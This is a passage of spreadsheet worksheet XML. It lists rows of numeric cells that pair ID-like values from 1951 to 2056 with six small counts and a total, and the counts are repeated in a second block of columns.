      </c>
      <c r="P769" s="8">
        <v>32</v>
      </c>
      <c r="Q769" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="770" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A770" s="7">
        <v>1951</v>
      </c>
      <c r="B770" s="8">
        <v>25</v>
      </c>
      <c r="C770" s="8">
        <v>1</v>
      </c>
      <c r="D770" s="8">
        <v>0</v>
      </c>
      <c r="E770" s="8">
        <v>0</v>
      </c>
      <c r="F770" s="8">
        <v>31</v>
      </c>
      <c r="G770" s="8">
        <v>11</v>
      </c>
      <c r="H770" s="8">
        <v>68</v>
      </c>
      <c r="K770" s="7">
        <v>1951</v>
      </c>
      <c r="L770" s="8">
        <v>25</v>
      </c>
      <c r="M770" s="8">
        <v>1</v>
      </c>
      <c r="N770" s="8">
        <v>0</v>
      </c>
      <c r="O770" s="8">
        <v>0</v>
      </c>
      <c r="P770" s="8">
        <v>31</v>
      </c>
      <c r="Q770" s="8">
        <v>11</v>
      </c>
    </row>
    <row r="771" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A771" s="7">
        <v>1952</v>
      </c>
      <c r="B771" s="8">
        <v>6</v>
      </c>
      <c r="C771" s="8">
        <v>1</v>
      </c>
      <c r="D771" s="8">
        <v>0</v>
      </c>
      <c r="E771" s="8">
        <v>5</v>
      </c>
      <c r="F771" s="8">
        <v>0</v>
      </c>
      <c r="G771" s="8">
        <v>0</v>
      </c>
      <c r="H771" s="8">
        <v>12</v>
      </c>
      <c r="K771" s="7">
        <v>1952</v>
      </c>
      <c r="L771" s="8">
        <v>6</v>
      </c>
      <c r="M771" s="8">
        <v>1</v>
      </c>
      <c r="N771" s="8">
        <v>0</v>
      </c>
      <c r="O771" s="8">
        <v>5</v>
      </c>
      <c r="P771" s="8">
        <v>0</v>
      </c>
      <c r="Q771" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="772" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A772" s="7">
        <v>1953</v>
      </c>
      <c r="B772" s="8">
        <v>0</v>
      </c>
      <c r="C772" s="8">
        <v>0</v>
      </c>
      <c r="D772" s="8">
        <v>0</v>
      </c>
      <c r="E772" s="8">
        <v>0</v>
      </c>
      <c r="F772" s="8">
        <v>20</v>
      </c>
      <c r="G772" s="8">
        <v>15</v>
      </c>
      <c r="H772" s="8">
        <v>35</v>
      </c>
      <c r="K772" s="7">
        <v>1953</v>
      </c>
      <c r="L772" s="8">
        <v>0</v>
      </c>
      <c r="M772" s="8">
        <v>0</v>
      </c>
      <c r="N772" s="8">
        <v>0</v>
      </c>
      <c r="O772" s="8">
        <v>0</v>
      </c>
      <c r="P772" s="8">
        <v>20</v>
      </c>
      <c r="Q772" s="8">
        <v>15</v>
      </c>
    </row>
    <row r="773" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A773" s="7">
        <v>1956</v>
      </c>
      <c r="B773" s="8">
        <v>26</v>
      </c>
      <c r="C773" s="8">
        <v>1</v>
      </c>
      <c r="D773" s="8">
        <v>10</v>
      </c>
      <c r="E773" s="8">
        <v>22</v>
      </c>
      <c r="F773" s="8">
        <v>7</v>
      </c>
      <c r="G773" s="8">
        <v>9</v>
      </c>
      <c r="H773" s="8">
        <v>75</v>
      </c>
      <c r="K773" s="7">
        <v>1956</v>
      </c>
      <c r="L773" s="8">
        <v>26</v>
      </c>
      <c r="M773" s="8">
        <v>1</v>
      </c>
      <c r="N773" s="8">
        <v>10</v>
      </c>
      <c r="O773" s="8">
        <v>22</v>
      </c>
      <c r="P773" s="8">
        <v>7</v>
      </c>
      <c r="Q773" s="8">
        <v>9</v>
      </c>
    </row>
    <row r="774" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A774" s="7">
        <v>1957</v>
      </c>
      <c r="B774" s="8">
        <v>6</v>
      </c>
      <c r="C774" s="8">
        <v>1</v>
      </c>
      <c r="D774" s="8">
        <v>0</v>
      </c>
      <c r="E774" s="8">
        <v>0</v>
      </c>
      <c r="F774" s="8">
        <v>1</v>
      </c>
      <c r="G774" s="8">
        <v>4</v>
      </c>
      <c r="H774" s="8">
        <v>12</v>
      </c>
      <c r="K774" s="7">
        <v>1957</v>
      </c>
      <c r="L774" s="8">
        <v>6</v>
      </c>
      <c r="M774" s="8">
        <v>1</v>
      </c>
      <c r="N774" s="8">
        <v>0</v>
      </c>
      <c r="O774" s="8">
        <v>0</v>
      </c>
      <c r="P774" s="8">
        <v>1</v>
      </c>
      <c r="Q774" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="775" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A775" s="7">
        <v>1960</v>
      </c>
      <c r="B775" s="8">
        <v>22</v>
      </c>
      <c r="C775" s="8">
        <v>1</v>
      </c>
      <c r="D775" s="8">
        <v>10</v>
      </c>
      <c r="E775" s="8">
        <v>10</v>
      </c>
      <c r="F775" s="8">
        <v>3</v>
      </c>
      <c r="G775" s="8">
        <v>5</v>
      </c>
      <c r="H775" s="8">
        <v>51</v>
      </c>
      <c r="K775" s="7">
        <v>1960</v>
      </c>
      <c r="L775" s="8">
        <v>22</v>
      </c>
      <c r="M775" s="8">
        <v>1</v>
      </c>
      <c r="N775" s="8">
        <v>10</v>
      </c>
      <c r="O775" s="8">
        <v>10</v>
      </c>
      <c r="P775" s="8">
        <v>3</v>
      </c>
      <c r="Q775" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="776" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A776" s="7">
        <v>1969</v>
      </c>
      <c r="B776" s="8">
        <v>26</v>
      </c>
      <c r="C776" s="8">
        <v>0</v>
      </c>
      <c r="D776" s="8">
        <v>0</v>
      </c>
      <c r="E776" s="8">
        <v>0</v>
      </c>
      <c r="F776" s="8">
        <v>28</v>
      </c>
      <c r="G776" s="8">
        <v>20</v>
      </c>
      <c r="H776" s="8">
        <v>74</v>
      </c>
      <c r="K776" s="7">
        <v>1969</v>
      </c>
      <c r="L776" s="8">
        <v>26</v>
      </c>
      <c r="M776" s="8">
        <v>0</v>
      </c>
      <c r="N776" s="8">
        <v>0</v>
      </c>
      <c r="O776" s="8">
        <v>0</v>
      </c>
      <c r="P776" s="8">
        <v>28</v>
      </c>
      <c r="Q776" s="8">
        <v>20</v>
      </c>
    </row>
    <row r="777" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A777" s="7">
        <v>1970</v>
      </c>
      <c r="B777" s="8">
        <v>7</v>
      </c>
      <c r="C777" s="8">
        <v>2</v>
      </c>
      <c r="D777" s="8">
        <v>2</v>
      </c>
      <c r="E777" s="8">
        <v>2</v>
      </c>
      <c r="F777" s="8">
        <v>5</v>
      </c>
      <c r="G777" s="8">
        <v>5</v>
      </c>
      <c r="H777" s="8">
        <v>23</v>
      </c>
      <c r="K777" s="7">
        <v>1970</v>
      </c>
      <c r="L777" s="8">
        <v>7</v>
      </c>
      <c r="M777" s="8">
        <v>2</v>
      </c>
      <c r="N777" s="8">
        <v>2</v>
      </c>
      <c r="O777" s="8">
        <v>2</v>
      </c>
      <c r="P777" s="8">
        <v>5</v>
      </c>
      <c r="Q777" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="778" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A778" s="7">
        <v>1971</v>
      </c>
      <c r="B778" s="8">
        <v>26</v>
      </c>
      <c r="C778" s="8">
        <v>0</v>
      </c>
      <c r="D778" s="8">
        <v>0</v>
      </c>
      <c r="E778" s="8">
        <v>0</v>
      </c>
      <c r="F778" s="8">
        <v>2</v>
      </c>
      <c r="G778" s="8">
        <v>2</v>
      </c>
      <c r="H778" s="8">
        <v>30</v>
      </c>
      <c r="K778" s="7">
        <v>1971</v>
      </c>
      <c r="L778" s="8">
        <v>26</v>
      </c>
      <c r="M778" s="8">
        <v>0</v>
      </c>
      <c r="N778" s="8">
        <v>0</v>
      </c>
      <c r="O778" s="8">
        <v>0</v>
      </c>
      <c r="P778" s="8">
        <v>2</v>
      </c>
      <c r="Q778" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="779" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A779" s="7">
        <v>1973</v>
      </c>
      <c r="B779" s="8">
        <v>26</v>
      </c>
      <c r="C779" s="8">
        <v>1</v>
      </c>
      <c r="D779" s="8">
        <v>0</v>
      </c>
      <c r="E779" s="8">
        <v>0</v>
      </c>
      <c r="F779" s="8">
        <v>29</v>
      </c>
      <c r="G779" s="8">
        <v>3</v>
      </c>
      <c r="H779" s="8">
        <v>59</v>
      </c>
      <c r="K779" s="7">
        <v>1973</v>
      </c>
      <c r="L779" s="8">
        <v>26</v>
      </c>
      <c r="M779" s="8">
        <v>1</v>
      </c>
      <c r="N779" s="8">
        <v>0</v>
      </c>
      <c r="O779" s="8">
        <v>0</v>
      </c>
      <c r="P779" s="8">
        <v>29</v>
      </c>
      <c r="Q779" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="780" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A780" s="7">
        <v>1977</v>
      </c>
      <c r="B780" s="8">
        <v>0</v>
      </c>
      <c r="C780" s="8">
        <v>0</v>
      </c>
      <c r="D780" s="8">
        <v>2</v>
      </c>
      <c r="E780" s="8">
        <v>0</v>
      </c>
      <c r="F780" s="8">
        <v>10</v>
      </c>
      <c r="G780" s="8">
        <v>3</v>
      </c>
      <c r="H780" s="8">
        <v>15</v>
      </c>
      <c r="K780" s="7">
        <v>1977</v>
      </c>
      <c r="L780" s="8">
        <v>0</v>
      </c>
      <c r="M780" s="8">
        <v>0</v>
      </c>
      <c r="N780" s="8">
        <v>2</v>
      </c>
      <c r="O780" s="8">
        <v>0</v>
      </c>
      <c r="P780" s="8">
        <v>10</v>
      </c>
      <c r="Q780" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="781" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A781" s="7">
        <v>1978</v>
      </c>
      <c r="B781" s="8">
        <v>0</v>
      </c>
      <c r="C781" s="8">
        <v>0</v>
      </c>
      <c r="D781" s="8">
        <v>0</v>
      </c>
      <c r="E781" s="8">
        <v>0</v>
      </c>
      <c r="F781" s="8">
        <v>20</v>
      </c>
      <c r="G781" s="8">
        <v>4</v>
      </c>
      <c r="H781" s="8">
        <v>24</v>
      </c>
      <c r="K781" s="7">
        <v>1978</v>
      </c>
      <c r="L781" s="8">
        <v>0</v>
      </c>
      <c r="M781" s="8">
        <v>0</v>
      </c>
      <c r="N781" s="8">
        <v>0</v>
      </c>
      <c r="O781" s="8">
        <v>0</v>
      </c>
      <c r="P781" s="8">
        <v>20</v>
      </c>
      <c r="Q781" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="782" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A782" s="7">
        <v>1980</v>
      </c>
      <c r="B782" s="8">
        <v>26</v>
      </c>
      <c r="C782" s="8">
        <v>1</v>
      </c>
      <c r="D782" s="8">
        <v>30</v>
      </c>
      <c r="E782" s="8">
        <v>20</v>
      </c>
      <c r="F782" s="8">
        <v>12</v>
      </c>
      <c r="G782" s="8">
        <v>8</v>
      </c>
      <c r="H782" s="8">
        <v>97</v>
      </c>
      <c r="K782" s="7">
        <v>1980</v>
      </c>
      <c r="L782" s="8">
        <v>26</v>
      </c>
      <c r="M782" s="8">
        <v>1</v>
      </c>
      <c r="N782" s="8">
        <v>30</v>
      </c>
      <c r="O782" s="8">
        <v>20</v>
      </c>
      <c r="P782" s="8">
        <v>12</v>
      </c>
      <c r="Q782" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="783" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A783" s="7">
        <v>1982</v>
      </c>
      <c r="B783" s="8">
        <v>26</v>
      </c>
      <c r="C783" s="8">
        <v>1</v>
      </c>
      <c r="D783" s="8">
        <v>5</v>
      </c>
      <c r="E783" s="8">
        <v>10</v>
      </c>
      <c r="F783" s="8">
        <v>2</v>
      </c>
      <c r="G783" s="8">
        <v>5</v>
      </c>
      <c r="H783" s="8">
        <v>49</v>
      </c>
      <c r="K783" s="7">
        <v>1982</v>
      </c>
      <c r="L783" s="8">
        <v>26</v>
      </c>
      <c r="M783" s="8">
        <v>1</v>
      </c>
      <c r="N783" s="8">
        <v>5</v>
      </c>
      <c r="O783" s="8">
        <v>10</v>
      </c>
      <c r="P783" s="8">
        <v>2</v>
      </c>
      <c r="Q783" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="784" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A784" s="7">
        <v>1984</v>
      </c>
      <c r="B784" s="8">
        <v>26</v>
      </c>
      <c r="C784" s="8">
        <v>1</v>
      </c>
      <c r="D784" s="8">
        <v>1</v>
      </c>
      <c r="E784" s="8">
        <v>30</v>
      </c>
      <c r="F784" s="8">
        <v>5</v>
      </c>
      <c r="G784" s="8">
        <v>0</v>
      </c>
      <c r="H784" s="8">
        <v>63</v>
      </c>
      <c r="K784" s="7">
        <v>1984</v>
      </c>
      <c r="L784" s="8">
        <v>26</v>
      </c>
      <c r="M784" s="8">
        <v>1</v>
      </c>
      <c r="N784" s="8">
        <v>1</v>
      </c>
      <c r="O784" s="8">
        <v>30</v>
      </c>
      <c r="P784" s="8">
        <v>5</v>
      </c>
      <c r="Q784" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="785" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A785" s="7">
        <v>1988</v>
      </c>
      <c r="B785" s="8">
        <v>48</v>
      </c>
      <c r="C785" s="8">
        <v>1</v>
      </c>
      <c r="D785" s="8">
        <v>15</v>
      </c>
      <c r="E785" s="8">
        <v>17</v>
      </c>
      <c r="F785" s="8">
        <v>8</v>
      </c>
      <c r="G785" s="8">
        <v>0</v>
      </c>
      <c r="H785" s="8">
        <v>89</v>
      </c>
      <c r="K785" s="7">
        <v>1988</v>
      </c>
      <c r="L785" s="8">
        <v>48</v>
      </c>
      <c r="M785" s="8">
        <v>1</v>
      </c>
      <c r="N785" s="8">
        <v>15</v>
      </c>
      <c r="O785" s="8">
        <v>17</v>
      </c>
      <c r="P785" s="8">
        <v>8</v>
      </c>
      <c r="Q785" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="786" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A786" s="7">
        <v>1989</v>
      </c>
      <c r="B786" s="8">
        <v>26</v>
      </c>
      <c r="C786" s="8">
        <v>1</v>
      </c>
      <c r="D786" s="8">
        <v>4</v>
      </c>
      <c r="E786" s="8">
        <v>4</v>
      </c>
      <c r="F786" s="8">
        <v>1</v>
      </c>
      <c r="G786" s="8">
        <v>0</v>
      </c>
      <c r="H786" s="8">
        <v>36</v>
      </c>
      <c r="K786" s="7">
        <v>1989</v>
      </c>
      <c r="L786" s="8">
        <v>26</v>
      </c>
      <c r="M786" s="8">
        <v>1</v>
      </c>
      <c r="N786" s="8">
        <v>4</v>
      </c>
      <c r="O786" s="8">
        <v>4</v>
      </c>
      <c r="P786" s="8">
        <v>1</v>
      </c>
      <c r="Q786" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="787" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A787" s="7">
        <v>1990</v>
      </c>
      <c r="B787" s="8">
        <v>24</v>
      </c>
      <c r="C787" s="8">
        <v>0</v>
      </c>
      <c r="D787" s="8">
        <v>0</v>
      </c>
      <c r="E787" s="8">
        <v>0</v>
      </c>
      <c r="F787" s="8">
        <v>22</v>
      </c>
      <c r="G787" s="8">
        <v>9</v>
      </c>
      <c r="H787" s="8">
        <v>55</v>
      </c>
      <c r="K787" s="7">
        <v>1990</v>
      </c>
      <c r="L787" s="8">
        <v>24</v>
      </c>
      <c r="M787" s="8">
        <v>0</v>
      </c>
      <c r="N787" s="8">
        <v>0</v>
      </c>
      <c r="O787" s="8">
        <v>0</v>
      </c>
      <c r="P787" s="8">
        <v>22</v>
      </c>
      <c r="Q787" s="8">
        <v>9</v>
      </c>
    </row>
    <row r="788" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A788" s="7">
        <v>1992</v>
      </c>
      <c r="B788" s="8">
        <v>27</v>
      </c>
      <c r="C788" s="8">
        <v>1</v>
      </c>
      <c r="D788" s="8">
        <v>0</v>
      </c>
      <c r="E788" s="8">
        <v>0</v>
      </c>
      <c r="F788" s="8">
        <v>8</v>
      </c>
      <c r="G788" s="8">
        <v>1</v>
      </c>
      <c r="H788" s="8">
        <v>37</v>
      </c>
      <c r="K788" s="7">
        <v>1992</v>
      </c>
      <c r="L788" s="8">
        <v>27</v>
      </c>
      <c r="M788" s="8">
        <v>1</v>
      </c>
      <c r="N788" s="8">
        <v>0</v>
      </c>
      <c r="O788" s="8">
        <v>0</v>
      </c>
      <c r="P788" s="8">
        <v>8</v>
      </c>
      <c r="Q788" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="789" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A789" s="7">
        <v>1999</v>
      </c>
      <c r="B789" s="8">
        <v>25</v>
      </c>
      <c r="C789" s="8">
        <v>2</v>
      </c>
      <c r="D789" s="8">
        <v>56</v>
      </c>
      <c r="E789" s="8">
        <v>224</v>
      </c>
      <c r="F789" s="8">
        <v>50</v>
      </c>
      <c r="G789" s="8">
        <v>150</v>
      </c>
      <c r="H789" s="8">
        <v>507</v>
      </c>
      <c r="K789" s="7">
        <v>1999</v>
      </c>
      <c r="L789" s="8">
        <v>25</v>
      </c>
      <c r="M789" s="8">
        <v>2</v>
      </c>
      <c r="N789" s="8">
        <v>56</v>
      </c>
      <c r="O789" s="8">
        <v>224</v>
      </c>
      <c r="P789" s="8">
        <v>50</v>
      </c>
      <c r="Q789" s="8">
        <v>150</v>
      </c>
    </row>
    <row r="790" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A790" s="7">
        <v>2009</v>
      </c>
      <c r="B790" s="8">
        <v>38</v>
      </c>
      <c r="C790" s="8">
        <v>43</v>
      </c>
      <c r="D790" s="8">
        <v>11</v>
      </c>
      <c r="E790" s="8">
        <v>31</v>
      </c>
      <c r="F790" s="8">
        <v>27</v>
      </c>
      <c r="G790" s="8">
        <v>12</v>
      </c>
      <c r="H790" s="8">
        <v>162</v>
      </c>
      <c r="K790" s="7">
        <v>2009</v>
      </c>
      <c r="L790" s="8">
        <v>38</v>
      </c>
      <c r="M790" s="8">
        <v>43</v>
      </c>
      <c r="N790" s="8">
        <v>11</v>
      </c>
      <c r="O790" s="8">
        <v>31</v>
      </c>
      <c r="P790" s="8">
        <v>27</v>
      </c>
      <c r="Q790" s="8">
        <v>12</v>
      </c>
    </row>
    <row r="791" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A791" s="7">
        <v>2016</v>
      </c>
      <c r="B791" s="8">
        <v>26</v>
      </c>
      <c r="C791" s="8">
        <v>1</v>
      </c>
      <c r="D791" s="8">
        <v>11</v>
      </c>
      <c r="E791" s="8">
        <v>62</v>
      </c>
      <c r="F791" s="8">
        <v>7</v>
      </c>
      <c r="G791" s="8">
        <v>12</v>
      </c>
      <c r="H791" s="8">
        <v>119</v>
      </c>
      <c r="K791" s="7">
        <v>2016</v>
      </c>
      <c r="L791" s="8">
        <v>26</v>
      </c>
      <c r="M791" s="8">
        <v>1</v>
      </c>
      <c r="N791" s="8">
        <v>11</v>
      </c>
      <c r="O791" s="8">
        <v>62</v>
      </c>
      <c r="P791" s="8">
        <v>7</v>
      </c>
      <c r="Q791" s="8">
        <v>12</v>
      </c>
    </row>
    <row r="792" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A792" s="7">
        <v>2019</v>
      </c>
      <c r="B792" s="8">
        <v>0</v>
      </c>
      <c r="C792" s="8">
        <v>0</v>
      </c>
      <c r="D792" s="8">
        <v>0</v>
      </c>
      <c r="E792" s="8">
        <v>0</v>
      </c>
      <c r="F792" s="8">
        <v>0</v>
      </c>
      <c r="G792" s="8">
        <v>0</v>
      </c>
      <c r="H792" s="8">
        <v>0</v>
      </c>
      <c r="K792" s="7">
        <v>2019</v>
      </c>
      <c r="L792" s="8">
        <v>0</v>
      </c>
      <c r="M792" s="8">
        <v>0</v>
      </c>
      <c r="N792" s="8">
        <v>0</v>
      </c>
      <c r="O792" s="8">
        <v>0</v>
      </c>
      <c r="P792" s="8">
        <v>0</v>
      </c>
      <c r="Q792" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="793" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A793" s="7">
        <v>2021</v>
      </c>
      <c r="B793" s="8">
        <v>26</v>
      </c>
      <c r="C793" s="8">
        <v>0</v>
      </c>
      <c r="D793" s="8">
        <v>2</v>
      </c>
      <c r="E793" s="8">
        <v>4</v>
      </c>
      <c r="F793" s="8">
        <v>8</v>
      </c>
      <c r="G793" s="8">
        <v>3</v>
      </c>
      <c r="H793" s="8">
        <v>43</v>
      </c>
      <c r="K793" s="7">
        <v>2021</v>
      </c>
      <c r="L793" s="8">
        <v>26</v>
      </c>
      <c r="M793" s="8">
        <v>0</v>
      </c>
      <c r="N793" s="8">
        <v>2</v>
      </c>
      <c r="O793" s="8">
        <v>4</v>
      </c>
      <c r="P793" s="8">
        <v>8</v>
      </c>
      <c r="Q793" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="794" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A794" s="7">
        <v>2024</v>
      </c>
      <c r="B794" s="8">
        <v>30</v>
      </c>
      <c r="C794" s="8">
        <v>1</v>
      </c>
      <c r="D794" s="8">
        <v>21</v>
      </c>
      <c r="E794" s="8">
        <v>39</v>
      </c>
      <c r="F794" s="8">
        <v>5</v>
      </c>
      <c r="G794" s="8">
        <v>5</v>
      </c>
      <c r="H794" s="8">
        <v>101</v>
      </c>
      <c r="K794" s="7">
        <v>2024</v>
      </c>
      <c r="L794" s="8">
        <v>30</v>
      </c>
      <c r="M794" s="8">
        <v>1</v>
      </c>
      <c r="N794" s="8">
        <v>21</v>
      </c>
      <c r="O794" s="8">
        <v>39</v>
      </c>
      <c r="P794" s="8">
        <v>5</v>
      </c>
      <c r="Q794" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="795" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A795" s="7">
        <v>2025</v>
      </c>
      <c r="B795" s="8">
        <v>30</v>
      </c>
      <c r="C795" s="8">
        <v>3</v>
      </c>
      <c r="D795" s="8">
        <v>0</v>
      </c>
      <c r="E795" s="8">
        <v>0</v>
      </c>
      <c r="F795" s="8">
        <v>215</v>
      </c>
      <c r="G795" s="8">
        <v>105</v>
      </c>
      <c r="H795" s="8">
        <v>353</v>
      </c>
      <c r="K795" s="7">
        <v>2025</v>
      </c>
      <c r="L795" s="8">
        <v>30</v>
      </c>
      <c r="M795" s="8">
        <v>3</v>
      </c>
      <c r="N795" s="8">
        <v>0</v>
      </c>
      <c r="O795" s="8">
        <v>0</v>
      </c>
      <c r="P795" s="8">
        <v>215</v>
      </c>
      <c r="Q795" s="8">
        <v>105</v>
      </c>
    </row>
    <row r="796" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A796" s="7">
        <v>2031</v>
      </c>
      <c r="B796" s="8">
        <v>26</v>
      </c>
      <c r="C796" s="8">
        <v>0</v>
      </c>
      <c r="D796" s="8">
        <v>0</v>
      </c>
      <c r="E796" s="8">
        <v>0</v>
      </c>
      <c r="F796" s="8">
        <v>7</v>
      </c>
      <c r="G796" s="8">
        <v>0</v>
      </c>
      <c r="H796" s="8">
        <v>33</v>
      </c>
      <c r="K796" s="7">
        <v>2031</v>
      </c>
      <c r="L796" s="8">
        <v>26</v>
      </c>
      <c r="M796" s="8">
        <v>0</v>
      </c>
      <c r="N796" s="8">
        <v>0</v>
      </c>
      <c r="O796" s="8">
        <v>0</v>
      </c>
      <c r="P796" s="8">
        <v>7</v>
      </c>
      <c r="Q796" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="797" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A797" s="7">
        <v>2035</v>
      </c>
      <c r="B797" s="8">
        <v>25</v>
      </c>
      <c r="C797" s="8">
        <v>1</v>
      </c>
      <c r="D797" s="8">
        <v>5</v>
      </c>
      <c r="E797" s="8">
        <v>10</v>
      </c>
      <c r="F797" s="8">
        <v>3</v>
      </c>
      <c r="G797" s="8">
        <v>5</v>
      </c>
      <c r="H797" s="8">
        <v>49</v>
      </c>
      <c r="K797" s="7">
        <v>2035</v>
      </c>
      <c r="L797" s="8">
        <v>25</v>
      </c>
      <c r="M797" s="8">
        <v>1</v>
      </c>
      <c r="N797" s="8">
        <v>5</v>
      </c>
      <c r="O797" s="8">
        <v>10</v>
      </c>
      <c r="P797" s="8">
        <v>3</v>
      </c>
      <c r="Q797" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="798" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A798" s="7">
        <v>2036</v>
      </c>
      <c r="B798" s="8">
        <v>26</v>
      </c>
      <c r="C798" s="8">
        <v>1</v>
      </c>
      <c r="D798" s="8">
        <v>30</v>
      </c>
      <c r="E798" s="8">
        <v>50</v>
      </c>
      <c r="F798" s="8">
        <v>3</v>
      </c>
      <c r="G798" s="8">
        <v>4</v>
      </c>
      <c r="H798" s="8">
        <v>114</v>
      </c>
      <c r="K798" s="7">
        <v>2036</v>
      </c>
      <c r="L798" s="8">
        <v>26</v>
      </c>
      <c r="M798" s="8">
        <v>1</v>
      </c>
      <c r="N798" s="8">
        <v>30</v>
      </c>
      <c r="O798" s="8">
        <v>50</v>
      </c>
      <c r="P798" s="8">
        <v>3</v>
      </c>
      <c r="Q798" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="799" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A799" s="7">
        <v>2046</v>
      </c>
      <c r="B799" s="8">
        <v>24</v>
      </c>
      <c r="C799" s="8">
        <v>1</v>
      </c>
      <c r="D799" s="8">
        <v>5</v>
      </c>
      <c r="E799" s="8">
        <v>5</v>
      </c>
      <c r="F799" s="8">
        <v>1</v>
      </c>
      <c r="G799" s="8">
        <v>0</v>
      </c>
      <c r="H799" s="8">
        <v>36</v>
      </c>
      <c r="K799" s="7">
        <v>2046</v>
      </c>
      <c r="L799" s="8">
        <v>24</v>
      </c>
      <c r="M799" s="8">
        <v>1</v>
      </c>
      <c r="N799" s="8">
        <v>5</v>
      </c>
      <c r="O799" s="8">
        <v>5</v>
      </c>
      <c r="P799" s="8">
        <v>1</v>
      </c>
      <c r="Q799" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="800" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A800" s="7">
        <v>2047</v>
      </c>
      <c r="B800" s="8">
        <v>26</v>
      </c>
      <c r="C800" s="8">
        <v>1</v>
      </c>
      <c r="D800" s="8">
        <v>2</v>
      </c>
      <c r="E800" s="8">
        <v>16</v>
      </c>
      <c r="F800" s="8">
        <v>13</v>
      </c>
      <c r="G800" s="8">
        <v>10</v>
      </c>
      <c r="H800" s="8">
        <v>68</v>
      </c>
      <c r="K800" s="7">
        <v>2047</v>
      </c>
      <c r="L800" s="8">
        <v>26</v>
      </c>
      <c r="M800" s="8">
        <v>1</v>
      </c>
      <c r="N800" s="8">
        <v>2</v>
      </c>
      <c r="O800" s="8">
        <v>16</v>
      </c>
      <c r="P800" s="8">
        <v>13</v>
      </c>
      <c r="Q800" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="801" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A801" s="7">
        <v>2051</v>
      </c>
      <c r="B801" s="8">
        <v>26</v>
      </c>
      <c r="C801" s="8">
        <v>1</v>
      </c>
      <c r="D801" s="8">
        <v>10</v>
      </c>
      <c r="E801" s="8">
        <v>0</v>
      </c>
      <c r="F801" s="8">
        <v>8</v>
      </c>
      <c r="G801" s="8">
        <v>2</v>
      </c>
      <c r="H801" s="8">
        <v>47</v>
      </c>
      <c r="K801" s="7">
        <v>2051</v>
      </c>
      <c r="L801" s="8">
        <v>26</v>
      </c>
      <c r="M801" s="8">
        <v>1</v>
      </c>
      <c r="N801" s="8">
        <v>10</v>
      </c>
      <c r="O801" s="8">
        <v>0</v>
      </c>
      <c r="P801" s="8">
        <v>8</v>
      </c>
      <c r="Q801" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="802" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A802" s="7">
        <v>2054</v>
      </c>
      <c r="B802" s="8">
        <v>25</v>
      </c>
      <c r="C802" s="8">
        <v>0</v>
      </c>
      <c r="D802" s="8">
        <v>0</v>
      </c>
      <c r="E802" s="8">
        <v>0</v>
      </c>
      <c r="F802" s="8">
        <v>2</v>
      </c>
      <c r="G802" s="8">
        <v>2</v>
      </c>
      <c r="H802" s="8">
        <v>29</v>
      </c>
      <c r="K802" s="7">
        <v>2054</v>
      </c>
      <c r="L802" s="8">
        <v>25</v>
      </c>
      <c r="M802" s="8">
        <v>0</v>
      </c>
      <c r="N802" s="8">
        <v>0</v>
      </c>
      <c r="O802" s="8">
        <v>0</v>
      </c>
      <c r="P802" s="8">
        <v>2</v>
      </c>
      <c r="Q802" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="803" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A803" s="7">
        <v>2056</v>
      </c>
      <c r="B803" s="8">
        <v>27</v>
      </c>
      <c r="C803" s="8">
        <v>1</v>
      </c>
      <c r="D803" s="8">
        <v>0</v>
      </c>
      <c r="E803" s="8">
        <v>0</v>
      </c>
      <c r="F803" s="8">
        <v>9</v>
      </c>
      <c r="G803" s="8">
        <v>0</v>
      </c>
      <c r="H803" s="8">
        <v>37</v>
      </c>
      <c r="K803" s="7">
        <v>2056</v>
      </c>
      <c r="L803" s="8">
        <v>27</v>
      </c>
      <c r="M803" s="8">
